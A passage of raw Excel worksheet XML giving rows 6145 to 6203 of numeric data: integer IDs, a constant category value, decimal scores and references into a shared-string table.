    <row r="6145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6145" s="1">
        <v>6143</v>
      </c>
      <c r="B6145">
        <v>2767</v>
      </c>
      <c r="C6145">
        <v>2767</v>
      </c>
      <c r="D6145">
        <v>3</v>
      </c>
      <c r="E6145">
        <v>0.94599997997283936</v>
      </c>
      <c r="F6145" t="s">
        <v>10120</v>
      </c>
      <c r="G6145" t="s">
        <v>12157</v>
      </c>
      <c r="H6145" t="s">
        <v>12158</v>
      </c>
    </row>
    <row r="6146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6146" s="1">
        <v>6144</v>
      </c>
      <c r="B6146">
        <v>2699</v>
      </c>
      <c r="C6146">
        <v>2699</v>
      </c>
      <c r="D6146">
        <v>3</v>
      </c>
      <c r="E6146">
        <v>0.53140002489089966</v>
      </c>
      <c r="F6146" t="s">
        <v>10120</v>
      </c>
      <c r="G6146" t="s">
        <v>12159</v>
      </c>
      <c r="H6146" t="s">
        <v>12160</v>
      </c>
    </row>
    <row r="6147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6147" s="1">
        <v>6145</v>
      </c>
      <c r="B6147">
        <v>5576</v>
      </c>
      <c r="C6147">
        <v>5576</v>
      </c>
      <c r="D6147">
        <v>3</v>
      </c>
      <c r="E6147">
        <v>0.99529999494552612</v>
      </c>
      <c r="F6147" t="s">
        <v>10120</v>
      </c>
      <c r="G6147" t="s">
        <v>12161</v>
      </c>
      <c r="H6147" t="s">
        <v>12162</v>
      </c>
    </row>
    <row r="6148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6148" s="1">
        <v>6146</v>
      </c>
      <c r="B6148">
        <v>2695</v>
      </c>
      <c r="C6148">
        <v>2695</v>
      </c>
      <c r="D6148">
        <v>3</v>
      </c>
      <c r="E6148">
        <v>0.76080000400543213</v>
      </c>
      <c r="F6148" t="s">
        <v>10120</v>
      </c>
      <c r="G6148" t="s">
        <v>12163</v>
      </c>
      <c r="H6148" t="s">
        <v>12164</v>
      </c>
    </row>
    <row r="6149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6149" s="1">
        <v>6147</v>
      </c>
      <c r="B6149">
        <v>2691</v>
      </c>
      <c r="C6149">
        <v>2691</v>
      </c>
      <c r="D6149">
        <v>3</v>
      </c>
      <c r="E6149">
        <v>0.97369998693466187</v>
      </c>
      <c r="F6149" t="s">
        <v>10120</v>
      </c>
      <c r="G6149" t="s">
        <v>12165</v>
      </c>
      <c r="H6149" t="s">
        <v>12166</v>
      </c>
    </row>
    <row r="6150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6150" s="1">
        <v>6148</v>
      </c>
      <c r="B6150">
        <v>2636</v>
      </c>
      <c r="C6150">
        <v>2636</v>
      </c>
      <c r="D6150">
        <v>3</v>
      </c>
      <c r="E6150">
        <v>0.67330002784729004</v>
      </c>
      <c r="F6150" t="s">
        <v>10120</v>
      </c>
      <c r="G6150" t="s">
        <v>12167</v>
      </c>
      <c r="H6150" t="s">
        <v>12168</v>
      </c>
    </row>
    <row r="6151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6151" s="1">
        <v>6149</v>
      </c>
      <c r="B6151">
        <v>2640</v>
      </c>
      <c r="C6151">
        <v>2640</v>
      </c>
      <c r="D6151">
        <v>3</v>
      </c>
      <c r="E6151">
        <v>0.8312000036239624</v>
      </c>
      <c r="F6151" t="s">
        <v>10120</v>
      </c>
      <c r="G6151" t="s">
        <v>12169</v>
      </c>
      <c r="H6151" t="s">
        <v>12170</v>
      </c>
    </row>
    <row r="6152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6152" s="1">
        <v>6150</v>
      </c>
      <c r="B6152">
        <v>2642</v>
      </c>
      <c r="C6152">
        <v>2642</v>
      </c>
      <c r="D6152">
        <v>3</v>
      </c>
      <c r="E6152">
        <v>0.56410002708435059</v>
      </c>
      <c r="F6152" t="s">
        <v>10120</v>
      </c>
      <c r="G6152" t="s">
        <v>12171</v>
      </c>
      <c r="H6152" t="s">
        <v>12172</v>
      </c>
    </row>
    <row r="6153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6153" s="1">
        <v>6151</v>
      </c>
      <c r="B6153">
        <v>2644</v>
      </c>
      <c r="C6153">
        <v>2644</v>
      </c>
      <c r="D6153">
        <v>3</v>
      </c>
      <c r="E6153">
        <v>0.77340000867843628</v>
      </c>
      <c r="F6153" t="s">
        <v>10120</v>
      </c>
      <c r="G6153" t="s">
        <v>12173</v>
      </c>
      <c r="H6153" t="s">
        <v>12174</v>
      </c>
    </row>
    <row r="6154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6154" s="1">
        <v>6152</v>
      </c>
      <c r="B6154">
        <v>2646</v>
      </c>
      <c r="C6154">
        <v>2646</v>
      </c>
      <c r="D6154">
        <v>3</v>
      </c>
      <c r="E6154">
        <v>0.56410002708435059</v>
      </c>
      <c r="F6154" t="s">
        <v>10120</v>
      </c>
      <c r="G6154" t="s">
        <v>12175</v>
      </c>
      <c r="H6154" t="s">
        <v>12172</v>
      </c>
    </row>
    <row r="6155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6155" s="1">
        <v>6153</v>
      </c>
      <c r="B6155">
        <v>2648</v>
      </c>
      <c r="C6155">
        <v>2648</v>
      </c>
      <c r="D6155">
        <v>3</v>
      </c>
      <c r="E6155">
        <v>0.99229997396469116</v>
      </c>
      <c r="F6155" t="s">
        <v>10120</v>
      </c>
      <c r="G6155" t="s">
        <v>12176</v>
      </c>
      <c r="H6155" t="s">
        <v>12177</v>
      </c>
    </row>
    <row r="6156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6156" s="1">
        <v>6154</v>
      </c>
      <c r="B6156">
        <v>2653</v>
      </c>
      <c r="C6156">
        <v>2653</v>
      </c>
      <c r="D6156">
        <v>3</v>
      </c>
      <c r="E6156">
        <v>0.49759998917579651</v>
      </c>
      <c r="F6156" t="s">
        <v>10120</v>
      </c>
      <c r="G6156" t="s">
        <v>12178</v>
      </c>
      <c r="H6156" t="s">
        <v>12179</v>
      </c>
    </row>
    <row r="6157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6157" s="1">
        <v>6155</v>
      </c>
      <c r="B6157">
        <v>1177</v>
      </c>
      <c r="C6157">
        <v>1177</v>
      </c>
      <c r="D6157">
        <v>3</v>
      </c>
      <c r="E6157">
        <v>0.75010001659393311</v>
      </c>
      <c r="F6157" t="s">
        <v>10120</v>
      </c>
      <c r="G6157" t="s">
        <v>12180</v>
      </c>
      <c r="H6157" t="s">
        <v>12181</v>
      </c>
    </row>
    <row r="6158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6158" s="1">
        <v>6156</v>
      </c>
      <c r="B6158">
        <v>2664</v>
      </c>
      <c r="C6158">
        <v>2664</v>
      </c>
      <c r="D6158">
        <v>3</v>
      </c>
      <c r="E6158">
        <v>0.83990001678466797</v>
      </c>
      <c r="F6158" t="s">
        <v>10120</v>
      </c>
      <c r="G6158" t="s">
        <v>12182</v>
      </c>
      <c r="H6158" t="s">
        <v>12183</v>
      </c>
    </row>
    <row r="6159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6159" s="1">
        <v>6157</v>
      </c>
      <c r="B6159">
        <v>2667</v>
      </c>
      <c r="C6159">
        <v>2667</v>
      </c>
      <c r="D6159">
        <v>3</v>
      </c>
      <c r="E6159">
        <v>0.81679999828338623</v>
      </c>
      <c r="F6159" t="s">
        <v>10120</v>
      </c>
      <c r="G6159" t="s">
        <v>12184</v>
      </c>
      <c r="H6159" t="s">
        <v>12185</v>
      </c>
    </row>
    <row r="6160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6160" s="1">
        <v>6158</v>
      </c>
      <c r="B6160">
        <v>2668</v>
      </c>
      <c r="C6160">
        <v>2668</v>
      </c>
      <c r="D6160">
        <v>3</v>
      </c>
      <c r="E6160">
        <v>0.756600022315979</v>
      </c>
      <c r="F6160" t="s">
        <v>10120</v>
      </c>
      <c r="G6160" t="s">
        <v>12186</v>
      </c>
      <c r="H6160" t="s">
        <v>12187</v>
      </c>
    </row>
    <row r="6161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6161" s="1">
        <v>6159</v>
      </c>
      <c r="B6161">
        <v>2669</v>
      </c>
      <c r="C6161">
        <v>2669</v>
      </c>
      <c r="D6161">
        <v>3</v>
      </c>
      <c r="E6161">
        <v>0.58359998464584351</v>
      </c>
      <c r="F6161" t="s">
        <v>10120</v>
      </c>
      <c r="G6161" t="s">
        <v>12188</v>
      </c>
      <c r="H6161" t="s">
        <v>12189</v>
      </c>
    </row>
    <row r="6162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6162" s="1">
        <v>6160</v>
      </c>
      <c r="B6162">
        <v>1176</v>
      </c>
      <c r="C6162">
        <v>1176</v>
      </c>
      <c r="D6162">
        <v>3</v>
      </c>
      <c r="E6162">
        <v>0.98879998922348022</v>
      </c>
      <c r="F6162" t="s">
        <v>10120</v>
      </c>
      <c r="G6162" t="s">
        <v>12190</v>
      </c>
      <c r="H6162" t="s">
        <v>12191</v>
      </c>
    </row>
    <row r="6163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6163" s="1">
        <v>6161</v>
      </c>
      <c r="B6163">
        <v>1167</v>
      </c>
      <c r="C6163">
        <v>1167</v>
      </c>
      <c r="D6163">
        <v>3</v>
      </c>
      <c r="E6163">
        <v>0.99750000238418579</v>
      </c>
      <c r="F6163" t="s">
        <v>10120</v>
      </c>
      <c r="G6163" t="s">
        <v>12192</v>
      </c>
      <c r="H6163" t="s">
        <v>12193</v>
      </c>
    </row>
    <row r="6164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6164" s="1">
        <v>6162</v>
      </c>
      <c r="B6164">
        <v>2685</v>
      </c>
      <c r="C6164">
        <v>2685</v>
      </c>
      <c r="D6164">
        <v>3</v>
      </c>
      <c r="E6164">
        <v>0.67570000886917114</v>
      </c>
      <c r="F6164" t="s">
        <v>10120</v>
      </c>
      <c r="G6164" t="s">
        <v>12194</v>
      </c>
      <c r="H6164" t="s">
        <v>12195</v>
      </c>
    </row>
    <row r="6165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6165" s="1">
        <v>6163</v>
      </c>
      <c r="B6165">
        <v>2686</v>
      </c>
      <c r="C6165">
        <v>2686</v>
      </c>
      <c r="D6165">
        <v>3</v>
      </c>
      <c r="E6165">
        <v>0.48089998960495001</v>
      </c>
      <c r="F6165" t="s">
        <v>10120</v>
      </c>
      <c r="G6165" t="s">
        <v>12196</v>
      </c>
      <c r="H6165" t="s">
        <v>12197</v>
      </c>
    </row>
    <row r="6166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6166" s="1">
        <v>6164</v>
      </c>
      <c r="B6166">
        <v>2689</v>
      </c>
      <c r="C6166">
        <v>2689</v>
      </c>
      <c r="D6166">
        <v>3</v>
      </c>
      <c r="E6166">
        <v>0.5900999903678894</v>
      </c>
      <c r="F6166" t="s">
        <v>10120</v>
      </c>
      <c r="G6166" t="s">
        <v>12198</v>
      </c>
      <c r="H6166" t="s">
        <v>12199</v>
      </c>
    </row>
    <row r="6167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6167" s="1">
        <v>6165</v>
      </c>
      <c r="B6167">
        <v>2693</v>
      </c>
      <c r="C6167">
        <v>2693</v>
      </c>
      <c r="D6167">
        <v>3</v>
      </c>
      <c r="E6167">
        <v>0.64829999208450317</v>
      </c>
      <c r="F6167" t="s">
        <v>10120</v>
      </c>
      <c r="G6167" t="s">
        <v>12200</v>
      </c>
      <c r="H6167" t="s">
        <v>12201</v>
      </c>
    </row>
    <row r="6168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6168" s="1">
        <v>6166</v>
      </c>
      <c r="B6168">
        <v>2499</v>
      </c>
      <c r="C6168">
        <v>2499</v>
      </c>
      <c r="D6168">
        <v>3</v>
      </c>
      <c r="E6168">
        <v>0.66089999675750732</v>
      </c>
      <c r="F6168" t="s">
        <v>10120</v>
      </c>
      <c r="G6168" t="s">
        <v>12202</v>
      </c>
      <c r="H6168" t="s">
        <v>12203</v>
      </c>
    </row>
    <row r="6169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6169" s="1">
        <v>6167</v>
      </c>
      <c r="B6169">
        <v>2498</v>
      </c>
      <c r="C6169">
        <v>2498</v>
      </c>
      <c r="D6169">
        <v>3</v>
      </c>
      <c r="E6169">
        <v>0.77399998903274536</v>
      </c>
      <c r="F6169" t="s">
        <v>10120</v>
      </c>
      <c r="G6169" t="s">
        <v>12204</v>
      </c>
      <c r="H6169" t="s">
        <v>12205</v>
      </c>
    </row>
    <row r="6170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6170" s="1">
        <v>6168</v>
      </c>
      <c r="B6170">
        <v>2497</v>
      </c>
      <c r="C6170">
        <v>2497</v>
      </c>
      <c r="D6170">
        <v>3</v>
      </c>
      <c r="E6170">
        <v>0.60369998216629028</v>
      </c>
      <c r="F6170" t="s">
        <v>10120</v>
      </c>
      <c r="G6170" t="s">
        <v>12206</v>
      </c>
      <c r="H6170" t="s">
        <v>12207</v>
      </c>
    </row>
    <row r="6171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6171" s="1">
        <v>6169</v>
      </c>
      <c r="B6171">
        <v>1339</v>
      </c>
      <c r="C6171">
        <v>1339</v>
      </c>
      <c r="D6171">
        <v>3</v>
      </c>
      <c r="E6171">
        <v>0.53030002117156982</v>
      </c>
      <c r="F6171" t="s">
        <v>10120</v>
      </c>
      <c r="G6171" t="s">
        <v>12208</v>
      </c>
      <c r="H6171" t="s">
        <v>12209</v>
      </c>
    </row>
    <row r="6172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6172" s="1">
        <v>6170</v>
      </c>
      <c r="B6172">
        <v>2287</v>
      </c>
      <c r="C6172">
        <v>2287</v>
      </c>
      <c r="D6172">
        <v>3</v>
      </c>
      <c r="E6172">
        <v>0.5242999792098999</v>
      </c>
      <c r="F6172" t="s">
        <v>10120</v>
      </c>
      <c r="G6172" t="s">
        <v>12210</v>
      </c>
      <c r="H6172" t="s">
        <v>12211</v>
      </c>
    </row>
    <row r="6173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6173" s="1">
        <v>6171</v>
      </c>
      <c r="B6173">
        <v>1338</v>
      </c>
      <c r="C6173">
        <v>1338</v>
      </c>
      <c r="D6173">
        <v>3</v>
      </c>
      <c r="E6173">
        <v>0.55290001630783081</v>
      </c>
      <c r="F6173" t="s">
        <v>10120</v>
      </c>
      <c r="G6173" t="s">
        <v>12212</v>
      </c>
      <c r="H6173" t="s">
        <v>12213</v>
      </c>
    </row>
    <row r="6174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6174" s="1">
        <v>6172</v>
      </c>
      <c r="B6174">
        <v>2291</v>
      </c>
      <c r="C6174">
        <v>2291</v>
      </c>
      <c r="D6174">
        <v>3</v>
      </c>
      <c r="E6174">
        <v>0.57370001077651978</v>
      </c>
      <c r="F6174" t="s">
        <v>10120</v>
      </c>
      <c r="G6174" t="s">
        <v>12214</v>
      </c>
      <c r="H6174" t="s">
        <v>12215</v>
      </c>
    </row>
    <row r="6175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6175" s="1">
        <v>6173</v>
      </c>
      <c r="B6175">
        <v>2292</v>
      </c>
      <c r="C6175">
        <v>2292</v>
      </c>
      <c r="D6175">
        <v>3</v>
      </c>
      <c r="E6175">
        <v>0.42680001258850098</v>
      </c>
      <c r="F6175" t="s">
        <v>10120</v>
      </c>
      <c r="G6175" t="s">
        <v>12216</v>
      </c>
      <c r="H6175" t="s">
        <v>12217</v>
      </c>
    </row>
    <row r="6176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6176" s="1">
        <v>6174</v>
      </c>
      <c r="B6176">
        <v>2299</v>
      </c>
      <c r="C6176">
        <v>2299</v>
      </c>
      <c r="D6176">
        <v>3</v>
      </c>
      <c r="E6176">
        <v>0.92040002346038818</v>
      </c>
      <c r="F6176" t="s">
        <v>10120</v>
      </c>
      <c r="G6176" t="s">
        <v>12218</v>
      </c>
      <c r="H6176" t="s">
        <v>12219</v>
      </c>
    </row>
    <row r="6177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6177" s="1">
        <v>6175</v>
      </c>
      <c r="B6177">
        <v>2300</v>
      </c>
      <c r="C6177">
        <v>2300</v>
      </c>
      <c r="D6177">
        <v>3</v>
      </c>
      <c r="E6177">
        <v>0.95749998092651367</v>
      </c>
      <c r="F6177" t="s">
        <v>10120</v>
      </c>
      <c r="G6177" t="s">
        <v>12220</v>
      </c>
      <c r="H6177" t="s">
        <v>12221</v>
      </c>
    </row>
    <row r="6178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6178" s="1">
        <v>6176</v>
      </c>
      <c r="B6178">
        <v>2302</v>
      </c>
      <c r="C6178">
        <v>2302</v>
      </c>
      <c r="D6178">
        <v>3</v>
      </c>
      <c r="E6178">
        <v>0.55330002307891846</v>
      </c>
      <c r="F6178" t="s">
        <v>10120</v>
      </c>
      <c r="G6178" t="s">
        <v>12222</v>
      </c>
      <c r="H6178" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="6179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6179" s="1">
        <v>6177</v>
      </c>
      <c r="B6179">
        <v>2313</v>
      </c>
      <c r="C6179">
        <v>2313</v>
      </c>
      <c r="D6179">
        <v>3</v>
      </c>
      <c r="E6179">
        <v>0.6589999794960022</v>
      </c>
      <c r="F6179" t="s">
        <v>10120</v>
      </c>
      <c r="G6179" t="s">
        <v>12224</v>
      </c>
      <c r="H6179" t="s">
        <v>12225</v>
      </c>
    </row>
    <row r="6180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6180" s="1">
        <v>6178</v>
      </c>
      <c r="B6180">
        <v>2324</v>
      </c>
      <c r="C6180">
        <v>2324</v>
      </c>
      <c r="D6180">
        <v>3</v>
      </c>
      <c r="E6180">
        <v>0.89429998397827148</v>
      </c>
      <c r="F6180" t="s">
        <v>10120</v>
      </c>
      <c r="G6180" t="s">
        <v>12226</v>
      </c>
      <c r="H6180" t="s">
        <v>12227</v>
      </c>
    </row>
    <row r="6181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6181" s="1">
        <v>6179</v>
      </c>
      <c r="B6181">
        <v>1311</v>
      </c>
      <c r="C6181">
        <v>1311</v>
      </c>
      <c r="D6181">
        <v>3</v>
      </c>
      <c r="E6181">
        <v>0.62370002269744873</v>
      </c>
      <c r="F6181" t="s">
        <v>10120</v>
      </c>
      <c r="G6181" t="s">
        <v>12228</v>
      </c>
      <c r="H6181" t="s">
        <v>12229</v>
      </c>
    </row>
    <row r="6182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6182" s="1">
        <v>6180</v>
      </c>
      <c r="B6182">
        <v>1296</v>
      </c>
      <c r="C6182">
        <v>1296</v>
      </c>
      <c r="D6182">
        <v>3</v>
      </c>
      <c r="E6182">
        <v>0.87059998512268066</v>
      </c>
      <c r="F6182" t="s">
        <v>10120</v>
      </c>
      <c r="G6182" t="s">
        <v>12230</v>
      </c>
      <c r="H6182" t="s">
        <v>12231</v>
      </c>
    </row>
    <row r="6183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6183" s="1">
        <v>6181</v>
      </c>
      <c r="B6183">
        <v>1293</v>
      </c>
      <c r="C6183">
        <v>1293</v>
      </c>
      <c r="D6183">
        <v>3</v>
      </c>
      <c r="E6183">
        <v>0.68370002508163452</v>
      </c>
      <c r="F6183" t="s">
        <v>10120</v>
      </c>
      <c r="G6183" t="s">
        <v>12232</v>
      </c>
      <c r="H6183" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="6184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6184" s="1">
        <v>6182</v>
      </c>
      <c r="B6184">
        <v>2348</v>
      </c>
      <c r="C6184">
        <v>2348</v>
      </c>
      <c r="D6184">
        <v>3</v>
      </c>
      <c r="E6184">
        <v>0.5810999870300293</v>
      </c>
      <c r="F6184" t="s">
        <v>10120</v>
      </c>
      <c r="G6184" t="s">
        <v>12234</v>
      </c>
      <c r="H6184" t="s">
        <v>12235</v>
      </c>
    </row>
    <row r="6185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6185" s="1">
        <v>6183</v>
      </c>
      <c r="B6185">
        <v>2349</v>
      </c>
      <c r="C6185">
        <v>2349</v>
      </c>
      <c r="D6185">
        <v>3</v>
      </c>
      <c r="E6185">
        <v>0.44389998912811279</v>
      </c>
      <c r="F6185" t="s">
        <v>10120</v>
      </c>
      <c r="G6185" t="s">
        <v>12236</v>
      </c>
      <c r="H6185" t="s">
        <v>12237</v>
      </c>
    </row>
    <row r="6186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6186" s="1">
        <v>6184</v>
      </c>
      <c r="B6186">
        <v>2351</v>
      </c>
      <c r="C6186">
        <v>2351</v>
      </c>
      <c r="D6186">
        <v>3</v>
      </c>
      <c r="E6186">
        <v>0.58929997682571411</v>
      </c>
      <c r="F6186" t="s">
        <v>10120</v>
      </c>
      <c r="G6186" t="s">
        <v>12238</v>
      </c>
      <c r="H6186" t="s">
        <v>12239</v>
      </c>
    </row>
    <row r="6187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6187" s="1">
        <v>6185</v>
      </c>
      <c r="B6187">
        <v>2352</v>
      </c>
      <c r="C6187">
        <v>2352</v>
      </c>
      <c r="D6187">
        <v>3</v>
      </c>
      <c r="E6187">
        <v>0.69870001077651978</v>
      </c>
      <c r="F6187" t="s">
        <v>10120</v>
      </c>
      <c r="G6187" t="s">
        <v>12240</v>
      </c>
      <c r="H6187" t="s">
        <v>12241</v>
      </c>
    </row>
    <row r="6188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6188" s="1">
        <v>6186</v>
      </c>
      <c r="B6188">
        <v>1340</v>
      </c>
      <c r="C6188">
        <v>1340</v>
      </c>
      <c r="D6188">
        <v>3</v>
      </c>
      <c r="E6188">
        <v>0.84359997510910034</v>
      </c>
      <c r="F6188" t="s">
        <v>10120</v>
      </c>
      <c r="G6188" t="s">
        <v>12242</v>
      </c>
      <c r="H6188" t="s">
        <v>12243</v>
      </c>
    </row>
    <row r="6189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6189" s="1">
        <v>6187</v>
      </c>
      <c r="B6189">
        <v>1286</v>
      </c>
      <c r="C6189">
        <v>1286</v>
      </c>
      <c r="D6189">
        <v>3</v>
      </c>
      <c r="E6189">
        <v>0.93650001287460327</v>
      </c>
      <c r="F6189" t="s">
        <v>10120</v>
      </c>
      <c r="G6189" t="s">
        <v>12244</v>
      </c>
      <c r="H6189" t="s">
        <v>12245</v>
      </c>
    </row>
    <row r="6190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6190" s="1">
        <v>6188</v>
      </c>
      <c r="B6190">
        <v>1341</v>
      </c>
      <c r="C6190">
        <v>1341</v>
      </c>
      <c r="D6190">
        <v>3</v>
      </c>
      <c r="E6190">
        <v>0.8442000150680542</v>
      </c>
      <c r="F6190" t="s">
        <v>10120</v>
      </c>
      <c r="G6190" t="s">
        <v>12246</v>
      </c>
      <c r="H6190" t="s">
        <v>12243</v>
      </c>
    </row>
    <row r="6191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6191" s="1">
        <v>6189</v>
      </c>
      <c r="B6191">
        <v>1343</v>
      </c>
      <c r="C6191">
        <v>1343</v>
      </c>
      <c r="D6191">
        <v>3</v>
      </c>
      <c r="E6191">
        <v>0.86699998378753662</v>
      </c>
      <c r="F6191" t="s">
        <v>10120</v>
      </c>
      <c r="G6191" t="s">
        <v>12247</v>
      </c>
      <c r="H6191" t="s">
        <v>12248</v>
      </c>
    </row>
    <row r="6192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6192" s="1">
        <v>6190</v>
      </c>
      <c r="B6192">
        <v>1385</v>
      </c>
      <c r="C6192">
        <v>1385</v>
      </c>
      <c r="D6192">
        <v>3</v>
      </c>
      <c r="E6192">
        <v>0.81120002269744873</v>
      </c>
      <c r="F6192" t="s">
        <v>10120</v>
      </c>
      <c r="G6192" t="s">
        <v>12249</v>
      </c>
      <c r="H6192" t="s">
        <v>12250</v>
      </c>
    </row>
    <row r="6193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6193" s="1">
        <v>6191</v>
      </c>
      <c r="B6193">
        <v>2238</v>
      </c>
      <c r="C6193">
        <v>2238</v>
      </c>
      <c r="D6193">
        <v>3</v>
      </c>
      <c r="E6193">
        <v>0.99220001697540283</v>
      </c>
      <c r="F6193" t="s">
        <v>10120</v>
      </c>
      <c r="G6193" t="s">
        <v>12251</v>
      </c>
      <c r="H6193" t="s">
        <v>12252</v>
      </c>
    </row>
    <row r="6194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6194" s="1">
        <v>6192</v>
      </c>
      <c r="B6194">
        <v>1379</v>
      </c>
      <c r="C6194">
        <v>1379</v>
      </c>
      <c r="D6194">
        <v>3</v>
      </c>
      <c r="E6194">
        <v>0.86299997568130493</v>
      </c>
      <c r="F6194" t="s">
        <v>10120</v>
      </c>
      <c r="G6194" t="s">
        <v>12253</v>
      </c>
      <c r="H6194" t="s">
        <v>12254</v>
      </c>
    </row>
    <row r="6195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6195" s="1">
        <v>6193</v>
      </c>
      <c r="B6195">
        <v>1370</v>
      </c>
      <c r="C6195">
        <v>1370</v>
      </c>
      <c r="D6195">
        <v>3</v>
      </c>
      <c r="E6195">
        <v>0.72310000658035278</v>
      </c>
      <c r="F6195" t="s">
        <v>10120</v>
      </c>
      <c r="G6195" t="s">
        <v>12255</v>
      </c>
      <c r="H6195" t="s">
        <v>12256</v>
      </c>
    </row>
    <row r="6196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6196" s="1">
        <v>6194</v>
      </c>
      <c r="B6196">
        <v>2244</v>
      </c>
      <c r="C6196">
        <v>2244</v>
      </c>
      <c r="D6196">
        <v>3</v>
      </c>
      <c r="E6196">
        <v>0.52100002765655518</v>
      </c>
      <c r="F6196" t="s">
        <v>10120</v>
      </c>
      <c r="G6196" t="s">
        <v>12257</v>
      </c>
      <c r="H6196" t="s">
        <v>12258</v>
      </c>
    </row>
    <row r="6197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6197" s="1">
        <v>6195</v>
      </c>
      <c r="B6197">
        <v>1364</v>
      </c>
      <c r="C6197">
        <v>1364</v>
      </c>
      <c r="D6197">
        <v>3</v>
      </c>
      <c r="E6197">
        <v>0.65890002250671387</v>
      </c>
      <c r="F6197" t="s">
        <v>10120</v>
      </c>
      <c r="G6197" t="s">
        <v>12259</v>
      </c>
      <c r="H6197" t="s">
        <v>12260</v>
      </c>
    </row>
    <row r="6198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6198" s="1">
        <v>6196</v>
      </c>
      <c r="B6198">
        <v>1361</v>
      </c>
      <c r="C6198">
        <v>1361</v>
      </c>
      <c r="D6198">
        <v>3</v>
      </c>
      <c r="E6198">
        <v>0.41310000419616699</v>
      </c>
      <c r="F6198" t="s">
        <v>10120</v>
      </c>
      <c r="G6198" t="s">
        <v>12261</v>
      </c>
      <c r="H6198" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="6199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6199" s="1">
        <v>6197</v>
      </c>
      <c r="B6199">
        <v>1360</v>
      </c>
      <c r="C6199">
        <v>1360</v>
      </c>
      <c r="D6199">
        <v>3</v>
      </c>
      <c r="E6199">
        <v>0.88919997215270996</v>
      </c>
      <c r="F6199" t="s">
        <v>10120</v>
      </c>
      <c r="G6199" t="s">
        <v>12263</v>
      </c>
      <c r="H6199" t="s">
        <v>12264</v>
      </c>
    </row>
    <row r="6200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6200" s="1">
        <v>6198</v>
      </c>
      <c r="B6200">
        <v>2250</v>
      </c>
      <c r="C6200">
        <v>2250</v>
      </c>
      <c r="D6200">
        <v>3</v>
      </c>
      <c r="E6200">
        <v>0.50209999084472656</v>
      </c>
      <c r="F6200" t="s">
        <v>10120</v>
      </c>
      <c r="G6200" t="s">
        <v>12265</v>
      </c>
      <c r="H6200" t="s">
        <v>12266</v>
      </c>
    </row>
    <row r="6201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6201" s="1">
        <v>6199</v>
      </c>
      <c r="B6201">
        <v>1357</v>
      </c>
      <c r="C6201">
        <v>1357</v>
      </c>
      <c r="D6201">
        <v>3</v>
      </c>
      <c r="E6201">
        <v>0.48420000076293951</v>
      </c>
      <c r="F6201" t="s">
        <v>10120</v>
      </c>
      <c r="G6201" t="s">
        <v>12267</v>
      </c>
      <c r="H6201" t="s">
        <v>12268</v>
      </c>
    </row>
    <row r="6202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6202" s="1">
        <v>6200</v>
      </c>
      <c r="B6202">
        <v>2256</v>
      </c>
      <c r="C6202">
        <v>2256</v>
      </c>
      <c r="D6202">
        <v>3</v>
      </c>
      <c r="E6202">
        <v>0.5404999852180481</v>
      </c>
      <c r="F6202" t="s">
        <v>10120</v>
      </c>
      <c r="G6202" t="s">
        <v>12269</v>
      </c>
      <c r="H6202" t="s">
        <v>12270</v>
      </c>
    </row>
    <row r="6203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6203" s="1">
        <v>6201</v>
      </c>
      <c r="B6203">
        <v>1356</v>
      </c>
      <c r="C6203">
